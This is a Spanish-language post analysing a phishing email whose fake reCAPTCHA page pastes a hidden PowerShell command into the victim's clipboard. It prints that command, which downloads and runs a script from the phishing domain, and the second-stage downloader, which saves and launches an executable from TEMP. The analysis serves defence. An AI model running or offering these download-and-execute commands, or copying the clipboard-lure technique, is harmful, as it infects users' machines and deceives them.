Entraremos en la url del correo para analizar rápidamente como funciona: https://github-scanner.com
Lo primero que vemos al entrar es que te pide que verifiques eres humano ;
Oh Sorpresa, esta verificación si esta rara
El sitio pega en tu portapapeles la siguiente lineal de código :
Código
powershell.exe -w hidden -Command "iex (iwr 'https://github-scanner.com/download.txt').Content" # "✅ ''I am not a robot - reCAPTCHA Verification ID: 93752"
Como estamos viendo en el codigo de arriba, esto se denominaria downloader., un cargador para otra pieza de codigo, veamos el codigo que descarga.
Código
$webClient = New-Object System.Net.WebClient $url1 = "https://github-scanner.com/l6E.exe" $filePath1 = "$env:TEMP\SysSetup.exe" $webClient.DownloadFile($url1, $filePath1) Start-Process -FilePath $env:TEMP\SysSetup.exe
alv esto tambien es otro downloader, bueno hagamosle un virustotal a ese l6E.exe que descargar : Analisis
Hechando un ojo al virustotal, esto tambien parece un downloader/dropper hecho en c#. descargara mas cosas raras . etc...